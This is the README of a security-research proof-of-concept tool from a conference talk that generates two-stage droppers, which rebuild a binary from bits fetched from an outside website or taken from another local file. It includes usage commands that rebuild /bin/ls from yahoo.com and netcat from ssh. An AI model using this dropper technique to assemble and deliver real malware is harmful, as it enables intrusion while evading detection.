Proof-of-concept two-stage dropper generator that uses bits from external sources

SafeBreach-Labs/mkmalwarefrom

mkmalwarefrom

mkmalwarefrom is a proof-of-concept two-stage dropper generator. It was released as part of the Malwares From Thin Bits talk given at the BSidesDFW 2017 conference by Itzik Kotler from SafeBreach Labs.

Slides are available here

Version

0.1.0

Installation

mkmalwarefrom requires Python and was tested with Python 2.7.13.

$ git clone https://github.com/SafeBreach-Labs/mkmalwarefrom.git
$ cd mkmalwarefrom
$ python mkmalwarefrom.py -h

Example: Generating /bin/ls from Yahoo

# assume mkmalwarefrom root directory
$ cat /bin/ls | ./mkmalwarefrom.py -1 http://www.yahoo.com > download_ls.py
$ python download_ls.py > ls2 
$ md5 /bin/ls ls2

Example: Generating /usr/bin/nc from /usr/bin/ssh

# assume mkmalwarefrom root directory
$ cat /usr/bin/nc | ./mkmalwarefrom.py -2 /usr/bin/ssh > mk_nc.py
$ python mk_nc.py > nc2
$ md5 /usr/bin/nc nc2

License

BSD 3-Clause
